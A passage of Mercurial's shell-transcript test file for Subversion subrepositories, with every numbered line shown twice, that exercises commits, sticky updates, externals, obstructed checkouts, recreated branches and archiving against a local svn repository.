56 $ svn co --quiet "$SVNREPOURL"/src s
57 $ mkdir subdir
57 $ mkdir subdir
58 $ svn co --quiet "$SVNREPOURL"/src subdir/s
58 $ svn co --quiet "$SVNREPOURL"/src subdir/s
59 $ hg add .hgsub
59 $ hg add .hgsub
60 $ hg ci -m1
60 $ hg ci -m1
61
61
62 make sure we avoid empty commits (issue2445)
62 make sure we avoid empty commits (issue2445)
63
63
64 $ hg sum
64 $ hg sum
65 parent: 1:* tip (glob)
65 parent: 1:* tip (glob)
66 1
66 1
67 branch: default
67 branch: default
68 commit: (clean)
68 commit: (clean)
69 update: (current)
69 update: (current)
70 phases: 2 draft
70 phases: 2 draft
71 $ hg ci -moops
71 $ hg ci -moops
72 nothing changed
72 nothing changed
73 [1]
73 [1]
74
74
75 debugsub
75 debugsub
76
76
77 $ hg debugsub
77 $ hg debugsub
78 path s
78 path s
79 source file://*/svn-repo/src (glob)
79 source file://*/svn-repo/src (glob)
80 revision 2
80 revision 2
81 path subdir/s
81 path subdir/s
82 source file://*/svn-repo/src (glob)
82 source file://*/svn-repo/src (glob)
83 revision 2
83 revision 2
84
84
85 change file in svn and hg, commit
85 change file in svn and hg, commit
86
86
87 $ echo a >> a
87 $ echo a >> a
88 $ echo alpha >> s/alpha
88 $ echo alpha >> s/alpha
89 $ hg sum
89 $ hg sum
90 parent: 1:* tip (glob)
90 parent: 1:* tip (glob)
91 1
91 1
92 branch: default
92 branch: default
93 commit: 1 modified, 1 subrepos
93 commit: 1 modified, 1 subrepos
94 update: (current)
94 update: (current)
95 phases: 2 draft
95 phases: 2 draft
96 $ hg commit --subrepos -m 'Message!' | filter_svn_output
96 $ hg commit --subrepos -m 'Message!' | filter_svn_output
97 committing subrepository s
97 committing subrepository s
98 Sending*s/alpha (glob)
98 Sending*s/alpha (glob)
99 Committed revision 3.
99 Committed revision 3.
100 Fetching external item into '*s/externals'* (glob)
100 Fetching external item into '*s/externals'* (glob)
101 External at revision 1.
101 External at revision 1.
102 At revision 3.
102 At revision 3.
103 $ hg debugsub
103 $ hg debugsub
104 path s
104 path s
105 source file://*/svn-repo/src (glob)
105 source file://*/svn-repo/src (glob)
106 revision 3
106 revision 3
107 path subdir/s
107 path subdir/s
108 source file://*/svn-repo/src (glob)
108 source file://*/svn-repo/src (glob)
109 revision 2
109 revision 2
110
110
111 missing svn file, commit should fail
111 missing svn file, commit should fail
112
112
113 $ rm s/alpha
113 $ rm s/alpha
114 $ hg commit --subrepos -m 'abort on missing file'
114 $ hg commit --subrepos -m 'abort on missing file'
115 committing subrepository s
115 committing subrepository s
116 abort: cannot commit missing svn entries (in subrepository "s")
116 abort: cannot commit missing svn entries (in subrepository "s")
117 [255]
117 [255]
118 $ svn revert s/alpha > /dev/null
118 $ svn revert s/alpha > /dev/null
119
119
120 add an unrelated revision in svn and update the subrepo to without
120 add an unrelated revision in svn and update the subrepo to without
121 bringing any changes.
121 bringing any changes.
122
122
123 $ svn mkdir "$SVNREPOURL/unrelated" -qm 'create unrelated'
123 $ svn mkdir "$SVNREPOURL/unrelated" -qm 'create unrelated'
124 $ svn up -q s
124 $ svn up -q s
125 $ hg sum
125 $ hg sum
126 parent: 2:* tip (glob)
126 parent: 2:* tip (glob)
127 Message!
127 Message!
128 branch: default
128 branch: default
129 commit: (clean)
129 commit: (clean)
130 update: (current)
130 update: (current)
131 phases: 3 draft
131 phases: 3 draft
132
132
133 $ echo a > s/a
133 $ echo a > s/a
134
134
135 should be empty despite change to s/a
135 should be empty despite change to s/a
136
136
137 $ hg st
137 $ hg st
138
138
139 add a commit from svn
139 add a commit from svn
140
140
141 $ cd "$WCROOT/src"
141 $ cd "$WCROOT/src"
142 $ svn up -q
142 $ svn up -q
143 $ echo xyz >> alpha
143 $ echo xyz >> alpha
144 $ svn propset svn:mime-type 'text/xml' alpha
144 $ svn propset svn:mime-type 'text/xml' alpha
145 property 'svn:mime-type' set on 'alpha'
145 property 'svn:mime-type' set on 'alpha'
146 $ svn ci -qm 'amend a from svn'
146 $ svn ci -qm 'amend a from svn'
147 $ cd ../../sub/t
147 $ cd ../../sub/t
148
148
149 this commit from hg will fail
149 this commit from hg will fail
150
150
151 $ echo zzz >> s/alpha
151 $ echo zzz >> s/alpha
152 $ (hg ci --subrepos -m 'amend alpha from hg' 2>&1; echo "[$?]") | grep -vi 'out of date'
152 $ (hg ci --subrepos -m 'amend alpha from hg' 2>&1; echo "[$?]") | grep -vi 'out of date'
153 committing subrepository s
153 committing subrepository s
154 abort: svn:*Commit failed (details follow): (glob)
154 abort: svn:*Commit failed (details follow): (glob)
155 [255]
155 [255]
156 $ svn revert -q s/alpha
156 $ svn revert -q s/alpha
157
157
158 this commit fails because of meta changes
158 this commit fails because of meta changes
159
159
160 $ svn propset svn:mime-type 'text/html' s/alpha
160 $ svn propset svn:mime-type 'text/html' s/alpha
161 property 'svn:mime-type' set on 's/alpha' (glob)
161 property 'svn:mime-type' set on 's/alpha' (glob)
162 $ (hg ci --subrepos -m 'amend alpha from hg' 2>&1; echo "[$?]") | grep -vi 'out of date'
162 $ (hg ci --subrepos -m 'amend alpha from hg' 2>&1; echo "[$?]") | grep -vi 'out of date'
163 committing subrepository s
163 committing subrepository s
164 abort: svn:*Commit failed (details follow): (glob)
164 abort: svn:*Commit failed (details follow): (glob)
165 [255]
165 [255]
166 $ svn revert -q s/alpha
166 $ svn revert -q s/alpha
167
167
168 this commit fails because of externals changes
168 this commit fails because of externals changes
169
169
170 $ echo zzz > s/externals/other
170 $ echo zzz > s/externals/other
171 $ hg ci --subrepos -m 'amend externals from hg'
171 $ hg ci --subrepos -m 'amend externals from hg'
172 committing subrepository s
172 committing subrepository s
173 abort: cannot commit svn externals (in subrepository "s")
173 abort: cannot commit svn externals (in subrepository "s")
174 [255]
174 [255]
175 $ hg diff --subrepos -r 1:2 | grep -v diff
175 $ hg diff --subrepos -r 1:2 | grep -v diff
176 --- a/.hgsubstate Thu Jan 01 00:00:00 1970 +0000
176 --- a/.hgsubstate Thu Jan 01 00:00:00 1970 +0000
177 +++ b/.hgsubstate Thu Jan 01 00:00:00 1970 +0000
177 +++ b/.hgsubstate Thu Jan 01 00:00:00 1970 +0000
178 @@ -1,2 +1,2 @@
178 @@ -1,2 +1,2 @@
179 -2 s
179 -2 s
180 +3 s
180 +3 s
181 2 subdir/s
181 2 subdir/s
182 --- a/a Thu Jan 01 00:00:00 1970 +0000
182 --- a/a Thu Jan 01 00:00:00 1970 +0000
183 +++ b/a Thu Jan 01 00:00:00 1970 +0000
183 +++ b/a Thu Jan 01 00:00:00 1970 +0000
184 @@ -1,1 +1,2 @@
184 @@ -1,1 +1,2 @@
185 a
185 a
186 +a
186 +a
187 $ svn revert -q s/externals/other
187 $ svn revert -q s/externals/other
188
188
189 this commit fails because of externals meta changes
189 this commit fails because of externals meta changes
190
190
191 $ svn propset svn:mime-type 'text/html' s/externals/other
191 $ svn propset svn:mime-type 'text/html' s/externals/other
192 property 'svn:mime-type' set on 's/externals/other' (glob)
192 property 'svn:mime-type' set on 's/externals/other' (glob)
193 $ hg ci --subrepos -m 'amend externals from hg'
193 $ hg ci --subrepos -m 'amend externals from hg'
194 committing subrepository s
194 committing subrepository s
195 abort: cannot commit svn externals (in subrepository "s")
195 abort: cannot commit svn externals (in subrepository "s")
196 [255]
196 [255]
197 $ svn revert -q s/externals/other
197 $ svn revert -q s/externals/other
198
198
199 clone
199 clone
200
200
201 $ cd ..
201 $ cd ..
202 $ hg clone t tc
202 $ hg clone t tc
203 updating to branch default
203 updating to branch default
204 A tc/s/alpha (glob)
204 A tc/s/alpha (glob)
205 U tc/s (glob)
205 U tc/s (glob)
206
206
207 Fetching external item into 'tc/s/externals'* (glob)
207 Fetching external item into 'tc/s/externals'* (glob)
208 A tc/s/externals/other (glob)
208 A tc/s/externals/other (glob)
209 Checked out external at revision 1.
209 Checked out external at revision 1.
210
210
211 Checked out revision 3.
211 Checked out revision 3.
212 A tc/subdir/s/alpha (glob)
212 A tc/subdir/s/alpha (glob)
213 U tc/subdir/s (glob)
213 U tc/subdir/s (glob)
214
214
215 Fetching external item into 'tc/subdir/s/externals'* (glob)
215 Fetching external item into 'tc/subdir/s/externals'* (glob)
216 A tc/subdir/s/externals/other (glob)
216 A tc/subdir/s/externals/other (glob)
217 Checked out external at revision 1.
217 Checked out external at revision 1.
218
218
219 Checked out revision 2.
219 Checked out revision 2.
220 3 files updated, 0 files merged, 0 files removed, 0 files unresolved
220 3 files updated, 0 files merged, 0 files removed, 0 files unresolved
221 $ cd tc
221 $ cd tc
222
222
223 debugsub in clone
223 debugsub in clone
224
224
225 $ hg debugsub
225 $ hg debugsub
226 path s
226 path s
227 source file://*/svn-repo/src (glob)
227 source file://*/svn-repo/src (glob)
228 revision 3
228 revision 3
229 path subdir/s
229 path subdir/s
230 source file://*/svn-repo/src (glob)
230 source file://*/svn-repo/src (glob)
231 revision 2
231 revision 2
232
232
233 verify subrepo is contained within the repo directory
233 verify subrepo is contained within the repo directory
234
234
235 $ $PYTHON -c "import os.path; print os.path.exists('s')"
235 $ $PYTHON -c "import os.path; print os.path.exists('s')"
236 True
236 True
237
237
238 update to nullrev (must delete the subrepo)
238 update to nullrev (must delete the subrepo)
239
239
240 $ hg up null
240 $ hg up null
241 0 files updated, 0 files merged, 3 files removed, 0 files unresolved
241 0 files updated, 0 files merged, 3 files removed, 0 files unresolved
242 $ ls
242 $ ls
243
243
244 Check hg update --clean
244 Check hg update --clean
245 $ cd "$TESTTMP/sub/t"
245 $ cd "$TESTTMP/sub/t"
246 $ cd s
246 $ cd s
247 $ echo c0 > alpha
247 $ echo c0 > alpha
248 $ echo c1 > f1
248 $ echo c1 > f1
249 $ echo c1 > f2
249 $ echo c1 > f2
250 $ svn add f1 -q
250 $ svn add f1 -q
251 $ svn status | sort
251 $ svn status | sort
252
252
253 ? * a (glob)
253 ? * a (glob)
254 ? * f2 (glob)
254 ? * f2 (glob)
255 A * f1 (glob)
255 A * f1 (glob)
256 M * alpha (glob)
256 M * alpha (glob)
257 Performing status on external item at 'externals'* (glob)
257 Performing status on external item at 'externals'* (glob)
258 X * externals (glob)
258 X * externals (glob)
259 $ cd ../..
259 $ cd ../..
260 $ hg -R t update -C
260 $ hg -R t update -C
261
261
262 Fetching external item into 't/s/externals'* (glob)
262 Fetching external item into 't/s/externals'* (glob)
263 Checked out external at revision 1.
263 Checked out external at revision 1.
264
264
265 Checked out revision 3.
265 Checked out revision 3.
266 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
266 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
267 $ cd t/s
267 $ cd t/s
268 $ svn status | sort
268 $ svn status | sort
269
269
270 ? * a (glob)
270 ? * a (glob)
271 ? * f1 (glob)
271 ? * f1 (glob)
272 ? * f2 (glob)
272 ? * f2 (glob)
273 Performing status on external item at 'externals'* (glob)
273 Performing status on external item at 'externals'* (glob)
274 X * externals (glob)
274 X * externals (glob)
275
275
276 Sticky subrepositories, no changes
276 Sticky subrepositories, no changes
277 $ cd "$TESTTMP/sub/t"
277 $ cd "$TESTTMP/sub/t"
278 $ hg id -n
278 $ hg id -n
279 2
279 2
280 $ cd s
280 $ cd s
281 $ svnversion
281 $ svnversion
282 3
282 3
283 $ cd ..
283 $ cd ..
284 $ hg update 1
284 $ hg update 1
285 U *s/alpha (glob)
285 U *s/alpha (glob)
286
286
287 Fetching external item into '*s/externals'* (glob)
287 Fetching external item into '*s/externals'* (glob)
288 Checked out external at revision 1.
288 Checked out external at revision 1.
289
289
290 Checked out revision 2.
290 Checked out revision 2.
291 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
291 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
292 $ hg id -n
292 $ hg id -n
293 1
293 1
294 $ cd s
294 $ cd s
295 $ svnversion
295 $ svnversion
296 2
296 2
297 $ cd ..
297 $ cd ..
298
298
299 Sticky subrepositories, file changes
299 Sticky subrepositories, file changes
300 $ touch s/f1
300 $ touch s/f1
301 $ cd s
301 $ cd s
302 $ svn add f1
302 $ svn add f1
303 A f1
303 A f1
304 $ cd ..
304 $ cd ..
305 $ hg id -n
305 $ hg id -n
306 1+
306 1+
307 $ cd s
307 $ cd s
308 $ svnversion
308 $ svnversion
309 2M
309 2M
310 $ cd ..
310 $ cd ..
311 $ hg update tip
311 $ hg update tip
312 subrepository s diverged (local revision: 2, remote revision: 3)
312 subrepository s diverged (local revision: 2, remote revision: 3)
313 (M)erge, keep (l)ocal [working copy] or keep (r)emote [destination]? m
313 (M)erge, keep (l)ocal [working copy] or keep (r)emote [destination]? m
314 subrepository sources for s differ
314 subrepository sources for s differ
315 use (l)ocal source (2) or (r)emote source (3)? l
315 use (l)ocal source (2) or (r)emote source (3)? l
316 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
316 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
317 $ hg id -n
317 $ hg id -n
318 2+
318 2+
319 $ cd s
319 $ cd s
320 $ svnversion
320 $ svnversion
321 2M
321 2M
322 $ cd ..
322 $ cd ..
323 $ hg update --clean tip
323 $ hg update --clean tip
324 U *s/alpha (glob)
324 U *s/alpha (glob)
325
325
326 Fetching external item into '*s/externals'* (glob)
326 Fetching external item into '*s/externals'* (glob)
327 Checked out external at revision 1.
327 Checked out external at revision 1.
328
328
329 Checked out revision 3.
329 Checked out revision 3.
330 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
330 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
331
331
332 Sticky subrepository, revision updates
332 Sticky subrepository, revision updates
333 $ hg id -n
333 $ hg id -n
334 2
334 2
335 $ cd s
335 $ cd s
336 $ svnversion
336 $ svnversion
337 3
337 3
338 $ cd ..
338 $ cd ..
339 $ cd s
339 $ cd s
340 $ svn update -qr 1
340 $ svn update -qr 1
341 $ cd ..
341 $ cd ..
342 $ hg update 1
342 $ hg update 1
343 subrepository s diverged (local revision: 3, remote revision: 2)
343 subrepository s diverged (local revision: 3, remote revision: 2)
344 (M)erge, keep (l)ocal [working copy] or keep (r)emote [destination]? m
344 (M)erge, keep (l)ocal [working copy] or keep (r)emote [destination]? m
345 subrepository sources for s differ (in checked out version)
345 subrepository sources for s differ (in checked out version)
346 use (l)ocal source (1) or (r)emote source (2)? l
346 use (l)ocal source (1) or (r)emote source (2)? l
347 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
347 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
348 $ hg id -n
348 $ hg id -n
349 1+
349 1+
350 $ cd s
350 $ cd s
351 $ svnversion
351 $ svnversion
352 1
352 1
353 $ cd ..
353 $ cd ..
354
354
355 Sticky subrepository, file changes and revision updates
355 Sticky subrepository, file changes and revision updates
356 $ touch s/f1
356 $ touch s/f1
357 $ cd s
357 $ cd s
358 $ svn add f1
358 $ svn add f1
359 A f1
359 A f1
360 $ svnversion
360 $ svnversion
361 1M
361 1M
362 $ cd ..
362 $ cd ..
363 $ hg id -n
363 $ hg id -n
364 1+
364 1+
365 $ hg update tip
365 $ hg update tip
366 subrepository s diverged (local revision: 3, remote revision: 3)
366 subrepository s diverged (local revision: 3, remote revision: 3)
367 (M)erge, keep (l)ocal [working copy] or keep (r)emote [destination]? m
367 (M)erge, keep (l)ocal [working copy] or keep (r)emote [destination]? m
368 subrepository sources for s differ
368 subrepository sources for s differ
369 use (l)ocal source (1) or (r)emote source (3)? l
369 use (l)ocal source (1) or (r)emote source (3)? l
370 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
370 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
371 $ hg id -n
371 $ hg id -n
372 2+
372 2+
373 $ cd s
373 $ cd s
374 $ svnversion
374 $ svnversion
375 1M
375 1M
376 $ cd ..
376 $ cd ..
377
377
378 Sticky repository, update --clean
378 Sticky repository, update --clean
379 $ hg update --clean tip | grep -v 's[/\]externals[/\]other'
379 $ hg update --clean tip | grep -v 's[/\]externals[/\]other'
380 U *s/alpha (glob)
380 U *s/alpha (glob)
381 U *s (glob)
381 U *s (glob)
382
382
383 Fetching external item into '*s/externals'* (glob)
383 Fetching external item into '*s/externals'* (glob)
384 Checked out external at revision 1.
384 Checked out external at revision 1.
385
385
386 Checked out revision 3.
386 Checked out revision 3.
387 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
387 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
388 $ hg id -n
388 $ hg id -n
389 2
389 2
390 $ cd s
390 $ cd s
391 $ svnversion
391 $ svnversion
392 3
392 3
393 $ cd ..
393 $ cd ..
394
394
395 Test subrepo already at intended revision:
395 Test subrepo already at intended revision:
396 $ cd s
396 $ cd s
397 $ svn update -qr 2
397 $ svn update -qr 2
398 $ cd ..
398 $ cd ..
399 $ hg update 1
399 $ hg update 1
400 subrepository s diverged (local revision: 3, remote revision: 2)
400 subrepository s diverged (local revision: 3, remote revision: 2)
401 (M)erge, keep (l)ocal [working copy] or keep (r)emote [destination]? m
401 (M)erge, keep (l)ocal [working copy] or keep (r)emote [destination]? m
402 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
402 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
403 $ hg id -n
403 $ hg id -n
404 1+
404 1+
405 $ cd s
405 $ cd s
406 $ svnversion
406 $ svnversion
407 2
407 2
408 $ cd ..
408 $ cd ..
409
409
410 Test case where subversion would fail to update the subrepo because there
410 Test case where subversion would fail to update the subrepo because there
411 are unknown directories being replaced by tracked ones (happens with rebase).
411 are unknown directories being replaced by tracked ones (happens with rebase).
412
412
413 $ cd "$WCROOT/src"
413 $ cd "$WCROOT/src"
414 $ mkdir dir
414 $ mkdir dir
415 $ echo epsilon.py > dir/epsilon.py
415 $ echo epsilon.py > dir/epsilon.py
416 $ svn add dir
416 $ svn add dir
417 A dir
417 A dir
418 A dir/epsilon.py (glob)
418 A dir/epsilon.py (glob)
419 $ svn ci -qm 'Add dir/epsilon.py'
419 $ svn ci -qm 'Add dir/epsilon.py'
420 $ cd ../..
420 $ cd ../..
421 $ hg init rebaserepo
421 $ hg init rebaserepo
422 $ cd rebaserepo
422 $ cd rebaserepo
423 $ svn co -r5 --quiet "$SVNREPOURL"/src s
423 $ svn co -r5 --quiet "$SVNREPOURL"/src s
424 $ echo "s = [svn] $SVNREPOURL/src" >> .hgsub
424 $ echo "s = [svn] $SVNREPOURL/src" >> .hgsub
425 $ hg add .hgsub
425 $ hg add .hgsub
426 $ hg ci -m addsub
426 $ hg ci -m addsub
427 $ echo a > a
427 $ echo a > a
428 $ hg add .
428 $ hg add .
429 adding a
429 adding a
430 $ hg ci -m adda
430 $ hg ci -m adda
431 $ hg up 0
431 $ hg up 0
432 0 files updated, 0 files merged, 1 files removed, 0 files unresolved
432 0 files updated, 0 files merged, 1 files removed, 0 files unresolved
433 $ svn up -qr6 s
433 $ svn up -qr6 s
434 $ hg ci -m updatesub
434 $ hg ci -m updatesub
435 created new head
435 created new head
436 $ echo pyc > s/dir/epsilon.pyc
436 $ echo pyc > s/dir/epsilon.pyc
437 $ hg up 1
437 $ hg up 1
438 D *s/dir (glob)
438 D *s/dir (glob)
439
439
440 Fetching external item into '*s/externals'* (glob)
440 Fetching external item into '*s/externals'* (glob)
441 Checked out external at revision 1.
441 Checked out external at revision 1.
442
442
443 Checked out revision 5.
443 Checked out revision 5.
444 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
444 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
445 $ hg up -q 2
445 $ hg up -q 2
446
446
447 Modify one of the externals to point to a different path so we can
447 Modify one of the externals to point to a different path so we can
448 test having obstructions when switching branches on checkout:
448 test having obstructions when switching branches on checkout:
449 $ hg checkout tip
449 $ hg checkout tip
450 0 files updated, 0 files merged, 0 files removed, 0 files unresolved
450 0 files updated, 0 files merged, 0 files removed, 0 files unresolved
451 $ echo "obstruct = [svn] $SVNREPOURL/externals" >> .hgsub
451 $ echo "obstruct = [svn] $SVNREPOURL/externals" >> .hgsub
452 $ svn co -r5 --quiet "$SVNREPOURL"/externals obstruct
452 $ svn co -r5 --quiet "$SVNREPOURL"/externals obstruct
453 $ hg commit -m 'Start making obstructed working copy'
453 $ hg commit -m 'Start making obstructed working copy'
454 $ hg book other
454 $ hg book other
455 $ hg co -r 'p1(tip)'
455 $ hg co -r 'p1(tip)'
456 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
456 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
457 (leaving bookmark other)
457 (leaving bookmark other)
458 $ echo "obstruct = [svn] $SVNREPOURL/src" >> .hgsub
458 $ echo "obstruct = [svn] $SVNREPOURL/src" >> .hgsub
459 $ svn co -r5 --quiet "$SVNREPOURL"/src obstruct
459 $ svn co -r5 --quiet "$SVNREPOURL"/src obstruct
460 $ hg commit -m 'Other branch which will be obstructed'
460 $ hg commit -m 'Other branch which will be obstructed'
461 created new head
461 created new head
462
462
463 Switching back to the head where we have another path mapped to the
463 Switching back to the head where we have another path mapped to the
464 same subrepo should work if the subrepo is clean.
464 same subrepo should work if the subrepo is clean.
465 $ hg co other
465 $ hg co other
466 A *obstruct/other (glob)
466 A *obstruct/other (glob)
467 Checked out revision 1.
467 Checked out revision 1.
468 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
468 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
469 (activating bookmark other)
469 (activating bookmark other)
470
470
471 This is surprising, but is also correct based on the current code:
471 This is surprising, but is also correct based on the current code:
472 $ echo "updating should (maybe) fail" > obstruct/other
472 $ echo "updating should (maybe) fail" > obstruct/other
473 $ hg co tip
473 $ hg co tip
474 abort: uncommitted changes
474 abort: uncommitted changes
475 (commit or update --clean to discard changes)
475 (commit or update --clean to discard changes)
476 [255]
476 [255]
477
477
478 Point to a Subversion branch which has since been deleted and recreated
478 Point to a Subversion branch which has since been deleted and recreated
479 First, create that condition in the repository.
479 First, create that condition in the repository.
480
480
481 $ hg ci --subrepos -m cleanup | filter_svn_output
481 $ hg ci --subrepos -m cleanup | filter_svn_output
482 committing subrepository obstruct
482 committing subrepository obstruct
483 Sending obstruct/other (glob)
483 Sending obstruct/other (glob)
484 Committed revision 7.
484 Committed revision 7.
485 At revision 7.
485 At revision 7.
486 $ svn mkdir -qm "baseline" $SVNREPOURL/trunk
486 $ svn mkdir -qm "baseline" $SVNREPOURL/trunk
487 $ svn copy -qm "initial branch" $SVNREPOURL/trunk $SVNREPOURL/branch
487 $ svn copy -qm "initial branch" $SVNREPOURL/trunk $SVNREPOURL/branch
488 $ svn co --quiet "$SVNREPOURL"/branch tempwc
488 $ svn co --quiet "$SVNREPOURL"/branch tempwc
489 $ cd tempwc
489 $ cd tempwc
490 $ echo "something old" > somethingold
490 $ echo "something old" > somethingold
491 $ svn add somethingold
491 $ svn add somethingold
492 A somethingold
492 A somethingold
493 $ svn ci -qm 'Something old'
493 $ svn ci -qm 'Something old'
494 $ svn rm -qm "remove branch" $SVNREPOURL/branch
494 $ svn rm -qm "remove branch" $SVNREPOURL/branch
495 $ svn copy -qm "recreate branch" $SVNREPOURL/trunk $SVNREPOURL/branch
495 $ svn copy -qm "recreate branch" $SVNREPOURL/trunk $SVNREPOURL/branch
496 $ svn up -q
496 $ svn up -q
497 $ echo "something new" > somethingnew
497 $ echo "something new" > somethingnew
498 $ svn add somethingnew
498 $ svn add somethingnew
499 A somethingnew
499 A somethingnew
500 $ svn ci -qm 'Something new'
500 $ svn ci -qm 'Something new'
501 $ cd ..
501 $ cd ..
502 $ rm -rf tempwc
502 $ rm -rf tempwc
503 $ svn co "$SVNREPOURL/branch"@10 recreated
503 $ svn co "$SVNREPOURL/branch"@10 recreated
504 A recreated/somethingold (glob)
504 A recreated/somethingold (glob)
505 Checked out revision 10.
505 Checked out revision 10.
506 $ echo "recreated = [svn] $SVNREPOURL/branch" >> .hgsub
506 $ echo "recreated = [svn] $SVNREPOURL/branch" >> .hgsub
507 $ hg ci -m addsub
507 $ hg ci -m addsub
508 $ cd recreated
508 $ cd recreated
509 $ svn up -q
509 $ svn up -q
510 $ cd ..
510 $ cd ..
511 $ hg ci -m updatesub
511 $ hg ci -m updatesub
512 $ hg up -r-2
512 $ hg up -r-2
513 D *recreated/somethingnew (glob)
513 D *recreated/somethingnew (glob)
514 A *recreated/somethingold (glob)
514 A *recreated/somethingold (glob)
515 Checked out revision 10.
515 Checked out revision 10.
516 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
516 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
517 (leaving bookmark other)
517 (leaving bookmark other)
518 $ test -f recreated/somethingold
518 $ test -f recreated/somethingold
519
519
520 Test archive
520 Test archive
521
521
522 $ hg archive -S ../archive-all --debug --config progress.debug=true
522 $ hg archive -S ../archive-all --debug --config progress.debug=true
523 archiving: 0/2 files (0.00%)
523 archiving: 0/2 files (0.00%)
524 archiving: .hgsub 1/2 files (50.00%)
524 archiving: .hgsub 1/2 files (50.00%)
525 archiving: .hgsubstate 2/2 files (100.00%)
525 archiving: .hgsubstate 2/2 files (100.00%)
526 archiving (obstruct): 0/1 files (0.00%)
526 archiving (obstruct): 0/1 files (0.00%)
527 archiving (obstruct): 1/1 files (100.00%)
527 archiving (obstruct): 1/1 files (100.00%)
528 archiving (recreated): 0/1 files (0.00%)
528 archiving (recreated): 0/1 files (0.00%)
529 archiving (recreated): 1/1 files (100.00%)
529 archiving (recreated): 1/1 files (100.00%)
530 archiving (s): 0/2 files (0.00%)
530 archiving (s): 0/2 files (0.00%)
531 archiving (s): 1/2 files (50.00%)
531 archiving (s): 1/2 files (50.00%)
532 archiving (s): 2/2 files (100.00%)
532 archiving (s): 2/2 files (100.00%)
533
533
534 $ hg archive -S ../archive-exclude --debug --config progress.debug=true -X **old
534 $ hg archive -S ../archive-exclude --debug --config progress.debug=true -X **old
535 archiving: 0/2 files (0.00%)
535 archiving: 0/2 files (0.00%)
536 archiving: .hgsub 1/2 files (50.00%)
536 archiving: .hgsub 1/2 files (50.00%)
537 archiving: .hgsubstate 2/2 files (100.00%)
537 archiving: .hgsubstate 2/2 files (100.00%)
538 archiving (obstruct): 0/1 files (0.00%)
538 archiving (obstruct): 0/1 files (0.00%)
539 archiving (obstruct): 1/1 files (100.00%)
539 archiving (obstruct): 1/1 files (100.00%)
540 archiving (recreated): 0 files
540 archiving (recreated): 0 files
541 archiving (s): 0/2 files (0.00%)
541 archiving (s): 0/2 files (0.00%)
542 archiving (s): 1/2 files (50.00%)
542 archiving (s): 1/2 files (50.00%)
543 archiving (s): 2/2 files (100.00%)
543 archiving (s): 2/2 files (100.00%)
544 $ find ../archive-exclude | sort
544 $ find ../archive-exclude | sort
545 ../archive-exclude
545 ../archive-exclude
546 ../archive-exclude/.hg_archival.txt
546 ../archive-exclude/.hg_archival.txt
547 ../archive-exclude/.hgsub
547 ../archive-exclude/.hgsub
548 ../archive-exclude/.hgsubstate
548 ../archive-exclude/.hgsubstate
549 ../archive-exclude/obstruct
549 ../archive-exclude/obstruct
550 ../archive-exclude/obstruct/other
550 ../archive-exclude/obstruct/other
551 ../archive-exclude/s
551 ../archive-exclude/s
552 ../archive-exclude/s/alpha
552 ../archive-exclude/s/alpha
553 ../archive-exclude/s/dir
553 ../archive-exclude/s/dir
554 ../archive-exclude/s/dir/epsilon.py
554 ../archive-exclude/s/dir/epsilon.py
555
555
556 Test forgetting files, not implemented in svn subrepo, used to
556 Test forgetting files, not implemented in svn subrepo, used to
557 traceback
557 traceback
558
558
559 #if no-windows
559 #if no-windows
560 $ hg forget 'notafile*'
560 $ hg forget 'notafile*'
561 notafile*: No such file or directory
561 notafile*: No such file or directory
562 [1]
562 [1]
563 #else
563 #else
564 $ hg forget 'notafile'
564 $ hg forget 'notafile'
565 notafile: * (glob)
565 notafile: * (glob)
566 [1]
566 [1]
567 #endif
567 #endif
568
568
569 Test a subrepo referencing a just moved svn path. Last commit rev will
569 Test a subrepo referencing a just moved svn path. Last commit rev will
570 be different from the revision, and the path will be different as
570 be different from the revision, and the path will be different as
571 well.
571 well.
572
572
573 $ cd "$WCROOT"
573 $ cd "$WCROOT"
574 $ svn up > /dev/null
574 $ svn up > /dev/null
575 $ mkdir trunk/subdir branches
575 $ mkdir trunk/subdir branches
576 $ echo a > trunk/subdir/a
576 $ echo a > trunk/subdir/a
577 $ svn add trunk/subdir branches
577 $ svn add trunk/subdir branches
578 A trunk/subdir (glob)
578 A trunk/subdir (glob)
579 A trunk/subdir/a (glob)
579 A trunk/subdir/a (glob)
580 A branches
580 A branches
581 $ svn ci -qm addsubdir
581 $ svn ci -qm addsubdir
582 $ svn cp -qm branchtrunk $SVNREPOURL/trunk $SVNREPOURL/branches/somebranch
582 $ svn cp -qm branchtrunk $SVNREPOURL/trunk $SVNREPOURL/branches/somebranch
583 $ cd ..
583 $ cd ..
584
584
585 $ hg init repo2
585 $ hg init repo2
586 $ cd repo2
586 $ cd repo2
587 $ svn co $SVNREPOURL/branches/somebranch/subdir
587 $ svn co $SVNREPOURL/branches/somebranch/subdir
588 A subdir/a (glob)
588 A subdir/a (glob)
589 Checked out revision 15.
589 Checked out revision 15.
590 $ echo "subdir = [svn] $SVNREPOURL/branches/somebranch/subdir" > .hgsub
590 $ echo "subdir = [svn] $SVNREPOURL/branches/somebranch/subdir" > .hgsub
591 $ hg add .hgsub
591 $ hg add .hgsub
592 $ hg ci -m addsub
592 $ hg ci -m addsub
593 $ hg up null
593 $ hg up null
594 0 files updated, 0 files merged, 2 files removed, 0 files unresolved
594 0 files updated, 0 files merged, 2 files removed, 0 files unresolved
595 $ hg up
595 $ hg up
596 A *subdir/a (glob)
596 A *subdir/a (glob)
597 Checked out revision 15.
597 Checked out revision 15.
